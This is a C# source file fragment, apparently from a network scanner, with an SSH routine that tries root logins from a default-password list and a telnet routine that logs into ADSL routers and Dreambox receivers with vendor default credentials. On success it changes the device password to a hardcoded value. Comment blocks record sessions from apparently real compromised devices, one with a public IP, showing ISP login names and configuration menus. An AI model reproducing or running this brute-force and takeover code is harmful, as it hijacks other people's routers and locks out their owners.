                {
                    /*
                        Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
                        if (scan_en_cours != null) scan_en_cours(this, info);                        
                    */
                    // Any failure: release the slot and discard the exception (e is unused).
                    cpt_th.Decrementer();
                //    Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
                //    Console.WriteLine("EXCEPT: " + e);
                }
            }
        }

        /// <summary>
        /// Candidate passwords that <c>sshtry</c> submits, in list order, for the fixed "root" account.
        /// </summary>
        /// <remarks>
        /// The entries appear to mix device/vendor defaults (e.g. "cisco", "dreambox", "epicrouter"),
        /// short digit runs, keyboard walks and common dictionary words; the second half is taken from
        /// the "passwords you should not use" article linked below. Read defensively, the list is a
        /// deny-list: an account that still accepts any of these values is exposed to trivial guessing.
        /// Order matters only in that it is the order of attempts.
        /// </remarks>
        static List<string> passwords = new List<string>
        {
            "admin",
            "1234",
            "cisco",
            "",              // empty password
            "Admin",
            "root",
            "toor",
            "default",
            "azerty",
            "qwerty",
            "12345",
            "123456",
            "1234567",
            "12345678",
            "dreambox",
            "test",
            "user",
            "demo",
            "ZXDSL",
            "password",
            "agadir",
            "menara",
            "Menara",
            "maroc",
            "vodafone",
            "epicrouter",    // Conexant console password (see the telnet transcript kept in telnettry)
            // Entries below come from:
            //http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
            "abc123",
            "monkey",
            "letmein",
            "trustno1",
            "dragon",
            "baseball",
            "111111",
            "iloveyou",
            "master",
            "sunshine",
            "ashley",
            "bailey",
            "passw0rd",
            "shadow",
            "123123",
            "654321",
            "superman",
            "qazwsx",
            "michael",
            "football"
            // "123123" is already listed above
        };

        /// <summary>
        /// Tries an SSH login as "root" on <paramref name="myip"/> once per entry of
        /// <c>passwords</c>, in list order, and writes every outcome to the console.
        /// </summary>
        /// <param name="myip">Host value passed unchanged to the <c>SshStream</c> constructor.</param>
        /// <remarks>
        /// A constructor call that returns without throwing is treated as an accepted password.
        /// The loop does not stop after a match; every remaining entry is still tried.
        /// Each candidate uses its own <c>SshStream</c>, so presumably the target sees one
        /// authentication attempt per entry (the pattern that failed-login rate limiting and
        /// lockout controls key on) - confirm against the library.
        /// The accepted password is printed in clear text, so captured console output of a run
        /// contains credentials.
        /// </remarks>
        public static void sshtry(string myip)
        {
            Console.WriteLine("sshtry");

            foreach (string candidate in passwords)
            {
                try
                {
                    Console.Write("-Connecting...");
                    SshStream session = new SshStream(myip, "root", candidate);

                    // Only reached when the constructor did not throw.
                    Console.WriteLine("{0} -> SSH PASSWORD IS: {1}\n", myip, candidate);
                    Console.WriteLine("OK ({0}/{1})", session.Cipher, session.Mac);
                    Console.WriteLine("Server version={0}, Client version={1}", session.ServerVersion, session.ClientVersion);
                    Console.WriteLine("-Use the 'exit' command to disconnect.");
                    Console.WriteLine();

                    // Stream settings are assigned but no command is sent before closing.
                    session.Prompt = "#";                              // end-of-response marker
                    session.RemoveTerminalEmulationCharacters = true;  // strip terminal control sequences

                    session.Close();
                    Console.WriteLine("Connection closed.");
                }
                catch (Exception ex)
                {
                    // The outcome is classified purely by the exception's message text.
                    string reason = ex.Message;
                    bool rejected = reason == "Auth fail";

                    if (!rejected)
                    {
                        // NOTE(review): the message is concatenated into the format string, so a
                        // message containing '{' or '}' makes this call throw FormatException from
                        // inside the handler.
                        Console.WriteLine("{0} SSH ERROR -> " + reason, myip);
                        continue;
                    }

                    Console.Write("{0} -> bad ssh password: {1}\n", myip, candidate);
                }
            }
        }

        public static void telnettry(string myip, string banner)
        {
            Console.WriteLine("telnettry");

            Socket Sock_scan;

            byte[] data = new byte[1024];
            string stringdata="";
            int recv;

            //try
            //{
                
                IPAddress adresseIP = IPAddress.Parse(myip);
                IPEndPoint ip = new IPEndPoint(adresseIP, 23);
//                Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                //Sock_scan.Blocking = false; // This is a non blocking IO
                
                /*
                // Assign Callback function to read from Asyncronous Socket
                callbackProc = new AsyncCallback(ConnectCallback);
                // Begin Asyncronous Connection
                Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
                */

//                Sock_scan.Connect(ip);
                //recv = Sock_scan.Receive(data);
                //Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
            
            //}
            //catch (Exception eeeee)
            //{
            //    Console.WriteLine(eeeee.Message);
            //}            

            String strRetPage = null;
            Int32 bytes;            
            Byte[] RecvBytes = new Byte[256];
            Encoding ASCII = Encoding.ASCII;
            /*
            bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
            
            strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

            while (bytes > 0)
            {
                bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
            }
            Console.WriteLine("Banner telnet: " + strRetPage);
            */

            if (banner.Contains("ogin:") || banner.Contains("sername:"))
            {
                Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                Sock_scan.Connect(ip);

                recv = Sock_scan.Receive(data);
                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                Console.WriteLine("{0} -> BANNERLOGIN: " + stringdata, myip);

                #region BANNERS01
                //Exemple: Vulcan
                //<BAD SEQUENCE>
                //Copyright (c) 2001-2003 by Conexant, Inc.

                //login: 01
                //password:
                //Echec Login
                //login:
                //login: 02
                //password:
                //Echec Login
                //login: 03
                //password:
                //Echec Login
                //login:
                //login: 04
                //password:
                //Echec Login
                //login: 05
                //password:
                //Echec Login


                //Perte de la connexion à l'hôte.
                //</BAD SEQUENCE>

                //************************************************************************************
                //                           CONEXANT SYSTEMS, INC.
                //   ACCESS RUNNER ADSL CONSOLE PORT  3.21

                //LOGON PASSWORD>
                //(epicrouter)
                //
                //
                //                                           CONEXANT SYSTEMS, INC.
                //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21


                //                                   MAIN MENU

                //                        0. Select VC Adaptor
                //                        1. Display Firmware Version
                //                        2. Password Setup
                //                        3. Connection Status
                //                        4. Network Setup
                //                        5. ADSL Setup
                //                        6. System Maintenance




                //                        S. Save Settings and Reset Unit
                //                        R. Reset Without Saving Changes
                //                        Q. Quit Session

                //                        Enter your selection below:

                //>>>
                //(2)
                //                           CONEXANT SYSTEMS, INC.
            //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

            //                              Password Setup


            //                        1. Change Administrative Password
            //                        2. Change PPP User Name and Password
            //                        3. Change User Password








            //                              Press 'B' to go Back
            //                          Press 'M' to go to Main Menu
            //                           Enter your selection below



            //>>>

            //(1)
            //                           CONEXANT SYSTEMS, INC.
            //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

            //                       Change Administrative Password


            //                        Enter New Admin Password:
            //              (no less than 8 characters, '&' is not accepted)
            //                              (Press ESC to quit)

            //>>>
            //
            //                           CONEXANT SYSTEMS, INC.
                //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

                //                       Confirm Administrative Password


                //                        Re-enter New Admin Password:
                //              (no less than 8 characters, '&' is not accepted)
                //                              (Press ESC to quit)

                //>>>

            //                           CONEXANT SYSTEMS, INC.
                //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

                //                              Password Setup


                //                        1. Change Administrative Password
                //                        2. Change PPP User Name and Password
                //                        3. Change User Password

                //                              Press 'B' to go Back
                //                          Press 'M' to go to Main Menu
                //                           Enter your selection below



                //>>>


                //                           CONEXANT SYSTEMS, INC.
            //                   ACCESS RUNNER ADSL CONSOLE PORT  3.21

            //                                     Quit Session


            //                        This will quit current telnet session.


            //                     Press 'Y' to continue, or 'B' to go back.
            //                             Press 'M' for main menu.


            //>>>



                //************************************************************************************
                //NetDVRDVS:admin
                //Password:
                //Login incorrect


                //************************************************************************************
                //User Access Verification

                //Username: admin
                //Password:
                //% Login invalid


                //************************************************************************************
                //(212.217.28.244)
                //User Access Verification

                //Password: 1234
                //GPBM>help
                //Help may be requested at any point in a command by entering
                //a question mark '?'.  If nothing matches, the help list will
                //be empty and you must backup until entering a '?' shows the
                //available options.
                //Two styles of help are provided:
                //1. Full help is available when you are ready to enter a
                //   command argument (e.g. 'show ?') and describes each possible
                //   argument.
                //2. Partial help is provided when an abbreviated argument is entered
                //   and you want to know what arguments match the input
                //   (e.g. 'show pr?'.)

                //GPBM>
                //GPBM>?
                //Exec commands:
                //  <1-99>           Session number to resume
                //  access-enable    Create a temporary Access-List entry
                //  access-profile   Apply user-profile to interface
                //  clear            Reset functions
                //  connect          Open a terminal connection
                //  disable          Turn off privileged commands
                //  disconnect       Disconnect an existing network connection
                //  enable           Turn on privileged commands
                //  exit             Exit from the EXEC
                //  help             Description of the interactive help system
                //  lock             Lock the terminal
                //  login            Log in as a particular user
                //  logout           Exit from the EXEC
                //  name-connection  Name an existing network connection
                //  pad              Open a X.29 PAD connection
                //  ping             Send echo messages
                //  ppp              Start IETF Point-to-Point Protocol (PPP)
                //  resume           Resume an active network connection
                //  rlogin           Open an rlogin connection
                //  set              Set system parameter (not config)
                //  show             Show running system information
                //  slip             Start Serial-line IP (SLIP)
                //  systat           Display information about terminal lines
                //  telnet           Open a telnet connection
                //  terminal         Set terminal line parameters
                //  traceroute       Trace route to destination
                //  tunnel           Open a tunnel connection
                //  where            List active connections
                //  x28              Become an X.28 PAD
                //  x3               Set X.3 parameters on PAD

                //GPBM>

                //GPBM>ping 8.8.8.8

                //Type escape sequence to abort.
                //Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
                //!!!!!
                //Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
                //GPBM>

                //GPBM>show ?
                  //backup         Backup status
                  //c1700          Show c1700 information
                  //cca            CCA information
                  //cdapi          CDAPI information
                  //class-map      Show QoS Class Map
                  //clock          Display the system clock
                  //compress       Show compression statistics
                  //dialer         Dialer parameters and statistics
                  //exception      exception informations
                  //flash:         display information about flash: file system

                  //history        Display the session command history
                  //hosts          IP domain-name, lookup style, nameservers, and host table
                  //isdn           ISDN information
                  //location       Display the system location
                  //modemcap       Show Modem Capabilities database
                  //policy-map     Show QoS Policy Map
                  //ppp            PPP parameters and statistics
                  //queue          Show queue contents
                  //queueing       Show queueing configuration
                  //radius         Shows radius information
                  //rmon           rmon statistics
                  //rtr            Response Time Reporter (RTR)
                  //sessions       Information about Telnet connections
                  //snmp           snmp statistics
                  //tacacs         Shows tacacs+ server statistics
                  //template       Template information
                  //terminal       Display terminal configuration parameters
                  //traffic-shape  traffic rate shaping configuration
                  //users          Display information about terminal lines
                  //version        System hardware and software status

                //GPBM>show version
                //Cisco Internetwork Operating System Software
                //IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
                //Copyright (c) 1986-2000 by cisco Systems, Inc.
                //Compiled Tue 14-Mar-00 16:40 by cmong
                //Image text-base: 0x80008088, data-base: 0x805B7EE0

                //ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)

                //GPBM uptime is 5 weeks, 6 days, 45 minutes
                //System returned to ROM by power-on
                //System image file is "flash:c1700-y-mz.121-1"

                //cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
                //.
                //Processor board ID JAD04180989 (362865562), with hardware revision 0000
                //M860 processor: part number 0, mask 32
                //Bridging software.
                //X.25 software, Version 3.0.0.
                //Basic Rate ISDN software, Version 1.1.
                //1 FastEthernet/IEEE 802.3 interface(s)
                //1 Serial(sync/async) network interface(s)
                //1 ISDN Basic Rate interface(s)
                //32K bytes of non-volatile configuration memory.
                //4096K bytes of processor board System flash (Read/Write)

                //Configuration register is 0x2102

                //GPBM>show diag
                //Slot 0:
                //        C1720 1FE Mainboard Port adapter, 3 ports
                //        Port adapter is analyzed
                //        Port adapter insertion time unknown
                //        EEPROM contents at hardware discovery:
                //        Hardware Revision        : 5.1
                //        PCB Serial Number        : JAD04180989
                //        Part Number              : 73-3201-05
                //        Board Revision           : 70
                //        Fab Version              : 04
                //        EEPROM format version 4
                //        EEPROM contents (hex):
                //          0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
                //          0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
                //          0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
                //          0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF

                //        WIC Slot 0:
                //        Serial 1T WAN daughter card
                //        Hardware revision 1.0   Board revision H0
                //        Serial number     0018074153    Part number    800-01514-01
                //        Test history      0x00          RMA number     00-00-00
                //        Connector type    WAN Module
                //        EEPROM format version 1
                //        EEPROM contents (hex):
                //        0x20:   01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
                //        0x30:   88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF

                //        WIC Slot 1:
                //        BRI S/T - 2186 WAN daughter card
                //        Hardware revision 1.3   Board revision A0
                //        Serial number     0019915070    Part number    800-01833-03
                //        Test history      0x00          RMA number     00-00-00
                //        Connector type    WAN Module
                //        EEPROM format version 1
                //        EEPROM contents (hex):
                //        0x20:   01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
                //        0x30:   50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF




                //************************************************************************************
                //-----------------------------------------------------------------------
                //Cisco Router and Security Device Manager (SDM) is installed on this device.
                //This feature requires the one-time use of the username "cisco"
                //with the password "cisco". The default username and password have a privilege le
                //vel of 15.

                //Please change these publicly known initial credentials using SDM or the IOS CLI.

                //Here are the Cisco IOS commands.

                //username <myuser>  privilege 15 secret 0 <mypassword>
                //no username cisco

                //Replace <myuser> and <mypassword> with the username and password you want to use
                //.

                //For more information about SDM please follow the instructions in the QUICK START

                //GUIDE for your router or go to http://www.cisco.com/go/sdm
                //-----------------------------------------------------------------------


                //User Access Verification

                //Username: cisco
                //Password:
                //% Login invalid


                //************************************************************************************                
                //BCM96338 ADSL Router
                //Login: bad
                //Password:
                //Login incorrect. Try again.
                //Login: admin
                //Password: password

                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   Main Menu

                //1.  ADSL Link State
                //2.  LAN
                //3.  WAN
                //4.  DNS Server
                //5.  Route Setup
                //6.  NAT
                //7.  Firewall
                //8.  Quality Of Service
                //9.  Management
                //10. Passwords
                //11. Diag
                //12. Reset to Default
                //13. Save and Reboot
                //14. Exit
                // ->

                //(10)

                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   Password Menu

                //1. Admin
                //2. User
                //3. Support
                //4. Exit
                ///Passwords ->

                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   Password Menu

                //1. Admin
                //2. User
                //3. Support
                //4. Exit
                ///Passwords -> 1

                //        Password Configuration Menu For User admin

                //Note: Maximum length of password is 16 characters.
                //Old password        :
                //New password        :
                //Confirm new password:
                //Password for admin changed successfully.

                //Hit <enter> to continue


                //Note: If you have problem with Backspace key, please make sure you configure you
                //r terminal emulator settings. For instance, from HyperTerminal you would need to
                // use File->Properties->Setting->Back Space key sends.


                //   DNS Menu

                //1. Configure
                //2. Show
                //3. Exit
                /// DNS Server -> 2

                //Automatic assigned IP address for DNS is enabled.
                //Primary DNS  : 62.251.229.237
                //Secondary DNS: 62.251.229.223

                //Hit <enter> to continue


                //14. Exit
                // -> 14

                //Bye bye. Have a nice day!!!


                //Perte de la connexion à l'hôte.


                //************************************************************************************ 
                //Password: 1234
                //                    Copyright (c) 1994 - 2003 ZyXEL Communications Corp.

                         //                         Prestige 650R-E1 Main Menu
                //                          Prestige 645 Main Menu

                         //Getting Started                      Advanced Management
                         //  1. General Setup                     21. Filter Set Configuration
                         //  3. LAN Setup                         22. SNMP Configuration
                         //  4. Internet Access Setup             23. System Password
                         //                                       24. System Maintenance
                         //Advanced Applications                  25. IP Routing Policy Setup
                         //  11. Remote Node Setup                26. Schedule Setup
                         //  12. Static Routing Setup
                         //  15. NAT Setup
                         //                                       99. Exit






                         //                     Enter Menu Selection Number:

                //(23)
                //

                                        //        Menu 23 - System Password

                                        //Old Password= ?
                                        //New Password= ?
                                        //Retype to confirm= ?













                                        // Enter here to CONFIRM or ESC to CANCEL:



                //

                    //     Menu 4 - Internet Access Setup

                    //ISP's Name= MyISP
                    //Encapsulation= PPPoE
                    //Multiplexing= LLC-based
                    //VPI #= 8
                    //VCI #= 35
                    //ATM QoS Type= UBR
                    //  Peak Cell Rate (PCR)= 0
                    //  Sustain Cell Rate (SCR)= 0
                    //  Maximum Burst Size (MBS)= 0
                    //My Login= saidi_im
                    //My Password= ********
                    //Idle Timeout (sec)= 0
                    //IP Address Assignment= Dynamic
                    //  IP Address= N/A
                    //Network Address Translation= SUA Only
                    //  Address Mapping Set= N/A

                    //Press ENTER to Confirm or ESC to Cancel:


                //************************************************************************************             
                //Password: 1234

                //                    Copyright (c) 1994 - 2004 ZyXEL Communications Corp.

                         //                         Prestige 660HW-61 Main Menu

                         //Getting Started                      Advanced Management
                         //  1. General Setup                     21. Filter Set Configuration
                         //  2. WAN Backup Setup                  22. SNMP Configuration
                         //  3. LAN Setup                         23. System Security
                         //  4. Internet Access Setup             24. System Maintenance
                         //                                       25. IP Routing Policy Setup
                         //Advanced Applications                  26. Schedule Setup
                         //  11. Remote Node Setup
                         //  12. Static Routing Setup
                         //  14. Dial-in User Setup               99. Exit
                         //  15. NAT Setup





                         //                     Enter Menu Selection Number:

                //(23)

                //

                    //        Menu 23 - System Security

                    //1. Change Password
                    //2. RADIUS Server

                    //4. IEEE802.1x

                //(1)
                //
                 //Menu 23.1 - System Security - Change Password

                 //  Old Password= ?
                 //  New Password= ?
                 //  Retype to confirm= ?













                 //   Enter here to CONFIRM or ESC to CANCEL:










                    //      Enter Menu Selection Number:



                //************************************************************************************
                //(Cisco router)
                //User Access Verification

                //Username: bad
                //Password:
                //% Login invalid

                //Username: admin
                //Password:
                //% Login invalid

                //Username: admin
                //Password:
                //% Login invalid


                //Perte de la connexion à l'hôte.


                //************************************************************************************
                //**************************
                //*                        *
                //*   The Gemini Project   *
                //*                        *
                //**************************

                //welcome on your dreambox! - Kernel 2.6.9 (09:30:19).

                //dreambox login: root
                //Password:


                //BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
                //Enter 'help' for a list of built-in commands.

                //root@dreambox:~>
                //root@dreambox:~> help
                //
                //Built-in commands:
                //-------------------
                //        . : alias bg break cd chdir command continue eval exec exit export
                //        false fg getopts hash help jobs kill let local pwd read readonly
                //        return set shift times trap true type ulimit umask unalias unset
                //        wait
                //root@dreambox:~> passwd
                //Changing password for root
                //Enter the new password (minimum of 5, maximum of 8 characters)
                //Please use a combination of upper and lower case letters and numbers.
                //Enter new password:
                //Re-enter new password:
                //Password changed.
                //root@dreambox:~>
                //root@dreambox:~>
                //\[                  fusermount          mkdir               start-stop-daemon
                //ash                 gbox                mknod               streampes
                //automount           gbox.ver            mkswap              streamripper
                //awk                 gdaemon             mmi.socket          streamsec
                //basename            gdaemon.socket      more                streamts
                //boot                grep                mount               stty
                //bunzip2             gunzip              mv                  su
                //busybox             gzip                nc                  swapoff
                //bzcat               halt                netstat             swapon
                //cat                 hdparm              nslookup            sync
                //chgrp               head                online.log          syslogd
                //chmod               hostname            passwd              tail
                //chown               hotplug             pid.info            tar
                //chroot              hotplug.socket      pidof               telnet
                //clear               httpd               ping                telnetd
                //cp                  id                  pmt.tmp             test
                //date                ifconfig            poweroff            top
                //dd                  in.ftpd             prockill            touch
                //df                  in.telnetd          ps                  true
                //dmesg               inadyn              pwd                 tty
                //dos2unix            inetd               rdate               udhcpc
                //dropbear            init                reboot              udpstreampes
                //dropbearkey         insmod              reset               umount
                //dropbearmulti       kill                rm                  uname
                //du                  killall             rmdir               uniq
                //dvbnet              klogd               rmmod               unix2dos
                //echo                lcdoff              route               uptime
                //enigma              lcdstuff            sc.info             usleep
                //enigmanet           ln                  sc01.info           vi
                //env                 loadkmap            scp                 wc
                //eraseall            logger              sed                 wget
                //etherwake           login               sh                  which
                //expr                logread             showlogo            whoami
                //false               losetup             sleep               xargs
                //find                ls                  smbmnt              yes
                //flashtool           lsmod               smbmount            zcat
                //free                md5sum              sort
                //************************************************************************************

                #endregion

                if (banner.Contains("dreambox"))
                {
                    //dreambox login:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> BANNERPASSWORD01: " + stringdata, myip);
                    //Password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
                }
                else
                {   //Vulcan
                    //login:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> BANNERPASSWORD: " + stringdata, myip);
                    //password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
                }
                //      cisco/cisco
                recv = Sock_scan.Receive(data);
                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                Console.WriteLine("{0} -> Response telnet01a: " + stringdata, myip);
                //Login Successful

                //login:
                if(stringdata.Contains("ogin:"))
                {
                    Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip);
                }
                else
                {
                    //$
                    //$passwd
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01b: " + stringdata, myip);
                    if (banner.Contains("Vulcan"))
                    {
                        //Enter Old Password:       
                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                        recv = Sock_scan.Receive(data);
                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                        Console.WriteLine("{0} -> Response telnet01c: " + stringdata, myip);
                    }
                    else
                    {
                        //This line is not present on a BusyBox or a dreambox
                    }
                    //Enter New Password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01d: " + stringdata, myip);
                    //Confirm New Password:
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);                
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01e: " + stringdata, myip);
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response telnet01f: " + stringdata, myip);
                    //Login incorrect   (dreambox)

                    //Password changed

                    //Set Done
                    //SINON:    Erreur: Combinaison nom utilisateur/mot de passe invalide

                    //passwd: An error occurred updating the password file.     //BusyBox
                }
                //login:

                Sock_scan.Close();
            }

                if (banner.Contains("assword:"))
                {
                    #region BANNERS
                    //********************************************************
                    //Info:Connection was denied by remote host according to ACL!

                    //********************************************************
                    //Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
                    //admin
                    //Valid commands are:
                    //sys             exit            ether           wan
                    //ip              bridge          dot1q           pktqos
                    //show            set             lan
                    
                    //********************************************************
                    //Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
                    //1234
                    //Valid commands are:
                    //sys             exit            ether           wan
                    //etherdbg        usb             ip              bridge
                    //dot1q           pktqos          show            set
                    //lan
                    //
                    //tc> sys countrycode
                    //country code = 253                //Djibouti
                    
                    //********************************************************
                    //                         *******************
                    //                         Welcome to Vulcan
                    //                         *******************

                    //Conexant Inc., Software Release 3.C10MTT0.8822A
                    //Copyright (c) 2001-2003 by Conexant, Inc.

                    //login:
                    //admin
                    
                    //password:
                    //admin
                    //Login Successful
                    //$
                    //$help
                    //Command        Description
                    //-------        -----------
                    //alias          To Alias a command
                    //apply          Apply configuration/image file
                    //commit         Commit the active config to the flash
                    //create         Create a new entry of specified type
                    //delete         Delete the specified entry
                    //download       Download a file on to the Device
                    //exit           To exit the CLI shell
                    //get            Display info for the search
                    //help           Provides help
                    //list           List files
                    //modify         Modify information for specified entry
                    //passwd         To modify user password
                    //ping           The normal ping command
                    //prompt         Change the user prompt
                    //reboot         Reboot the device
                    //remove         Remove file
                    //reset          Reset info for the specified entry
                    //size           ATM Sizing Information
                    //traceroute     The normal traceroute command
                    //trigger        To set trigger
                    //unalias        To undefine previously defined alias
                    //verbose        Switch ON/OFF the verbose mode


                    //********************************************************
                    //Password: 1234
                    //Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
                    //ras>
                    //ras> help
                    //Valid commands are:
                    //sys             exit            ether           wan
                    //aux             wlan            ip              ipsec
                    //bridge          certificates    bm              lan
                    //vlan            radius          8021x           autoSec
                    //ras> sys
                    //packetscan      adjtime         callhist        countrycode
                    //date            domainname      edit            extraphnum
                    //feature         firewall        myZyxelCom      hostname
                    //logs            stdio           datetime        time
                    //tos             trcdisp         trclog          trcpacket
                    //version         view            wdog            romreset
                    //upnp            atsh            atmu            ateb
                    //xmodemmode      diag            save            display
                    //adminPassword   userPassword    default         fwnotify
                    //tripleplay      general         socket          filter
                    //ddns            cpu             winmes          snmp
                    //ras> sys adminPassword
                    //Usage: adminPassword <new adminPassword>
                    //ras> sys adminPassword j3R0m3!!

                    /*
                                        Copyright (c) 1994 - 2003 ZyXEL Communications Corp.

                                                  Prestige 650R-E1 Main Menu

                         Getting Started                      Advanced Management
                           1. General Setup                     21. Filter Set Configuration
                           3. LAN Setup                         22. SNMP Configuration
                           4. Internet Access Setup             23. System Password
                                                                24. System Maintenance
                         Advanced Applications                  25. IP Routing Policy Setup
                           11. Remote Node Setup                26. Schedule Setup
                           12. Static Routing Setup
                           15. NAT Setup
                                                                99. Exit






                                              Enter Menu Selection Number:
                    */
                    /*
                                                 Menu 1 - General Setup

                    System Name= ?
                    Location=
                    Contact Person's Name=
                    Domain Name=
                    Edit Dynamic DNS= No

                    Route IP= Yes
                    Bridge= No








                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                    

                            Menu 23 - System Password

                    Old Password= ?
                    New Password= ?
                    Retype to confirm= ?













                     Enter here to CONFIRM or ESC to CANCEL:
                    */
                    /*
                                                   Menu 3 - LAN Setup

                    1. LAN Port Filter Setup
                    2. TCP/IP and DHCP Setup














                          Enter Menu Selection Number:
                    */
                    /*
                                            Menu 3.1 - LAN Port Filter Setup

                    Input Filter Sets:
                      protocol filters=
                      device filters=
                    Output Filter Sets:
                      protocol filters=
                      device filters=
                    */
                    /*
                                            Menu 3.2 - TCP/IP and DHCP Setup

                    DHCP Setup
                      DHCP= Server
                      Client IP Pool Starting Address= 192.168.1.33
                      Size of Client IP Pool= 32
                      Primary DNS Server= 0.0.0.0
                      Secondary DNS Server= 0.0.0.0
                      Remote DHCP Server= N/A
                    TCP/IP Setup:
                      IP Address= 192.168.1.1
                      IP Subnet Mask= 255.255.255.0
                      RIP Direction= Both
                        Version= RIP-2B
                      Multicast= None
                      IP Policies=
                      Edit IP Alias= No

                    Press ENTER to Confirm or ESC to Cancel:

Press Space Bar to Toggle.
                    */
                    /*
                                             Menu 4 - Internet Access Setup

                    ISP's Name= MyISP
                    Encapsulation= PPPoE
                    Multiplexing= LLC-based
                    VPI #= 8
                    VCI #= 35
                    ATM QoS Type= UBR
                      Peak Cell Rate (PCR)= 0
                      Sustain Cell Rate (SCR)= 0
                      Maximum Burst Size (MBS)= 0
                    My Login= zemzem2
                    My Password= ********
                    Idle Timeout (sec)= 0
                    IP Address Assignment= Dynamic
                      IP Address= N/A
                    Network Address Translation= SUA Only
                      Address Mapping Set= N/A

                    Press ENTER to Confirm or ESC to Cancel:
                    */
                    /*
                                               Menu 11 - Remote Node Setup

                     1. MyISP (ISP, SUA)
                     2. ________
                     3. ________
                     4. ________
                     5. ________
                     6. ________
                     7. ________
                     8. ________








                              Enter Node # to Edit:
                    */
                    /*
                                             Menu 11.1 - Remote Node Profile

     Rem Node Name= MyISP                 Route= IP
     Active= Yes                          Bridge= No

     Encapsulation= PPPoE                 Edit IP/Bridge= No
     Multiplexing= LLC-based              Edit ATM Options= No
     Service Name= zyxel
     Incoming:                            Telco Option:
       Rem Login=                           Allocated Budget(min)= 0
       Rem Password= ********               Period(hr)= 0
     Outgoing:                              Schedule Sets=
